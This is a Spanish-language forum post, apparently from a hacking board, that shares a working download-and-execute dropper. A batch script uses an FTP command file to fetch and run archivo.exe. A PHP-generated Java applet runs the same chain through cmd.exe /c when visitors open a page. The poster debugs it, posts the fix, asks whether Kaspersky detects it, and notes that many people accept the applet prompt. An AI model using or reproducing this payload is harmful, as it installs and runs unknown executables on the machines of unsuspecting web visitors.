Código:
@echo off
echo usuario@nombreftp.com>C:\datos.txt
echo contraseña>>C:\datos.txt
echo cd /path>>C:\datos.txt
echo pwd>>C:\datos.txt
echo binary>>C:\datos.txt
echo get archivo.exe>>C:\datos.txt
echo bye>>C:\datos.txt
echo quit>>C:\datos.txt
ftp -s:C:\datos.txt nombreftp.com
start archivo.exe
(Haber si alguien que tenga kav puede probar si lo detecta por proactiva, sería raro)
El caso es que ése código funciona perfectamente, me descarga el archivo del ftp y me lo ejecuta, pero cuando trato de pasarlo a php para que lo ejecute el applet con cmd.exe /c de esta forma:
Código
echo "<applet width='1' height='1' code='skata.class' archive='skataMPE.jar'>"; echo "<param name='first' value=' cmd.exe /c echo usuario@nombreftp.com>C:\datos.txt & echo contraseña>>C:\datos.txt & echo cd /path>>C:\datos.txt & echo pwd>>C:\datos.txt & echo binary>>C:\datos.txt & echo get archivo.exe>>C:\datos.txt & echo bye>>C:\datos.txt & echo quit>>C:\datos.txt & ftp -s:C:\datos.txt nombreftp.com & start archivo.exe '>"; echo "</applet>";
Al abrir la pagina, el applet se ejecuta, ejecuta los comandos pero me genera un archivo.exe de 0 bytes y obvio da error al ejecutarlo, alguien sabe a que se debe o como lo podría solucionar?
Saludos
PD: Si cae mucha gente, si no fuera por lo del kis sería perfecto, ya que en todos los applets no firmados sale ese mensaje, la gente está acostumbrada a aceptarlo, inicias un chat y sale el mensaje, te vas a jugar al ajedrez y sale ese mensaje, etc...
Edito, el fallo era un espacio, hay que hacer:
Código:
cmd.exe /c echo usuario@nombreftp.com>C:\datos.txt&echo contraseña>>C:\datos.txt &
Código:
cmd.exe /c echo usuario@nombreftp.com>C:\datos.txt & echo contraseña>>C:\datos.txt &
Un erro tonto que nos costo a mi y a wofo un gran dolor de cabeza, jajaja.
Saludos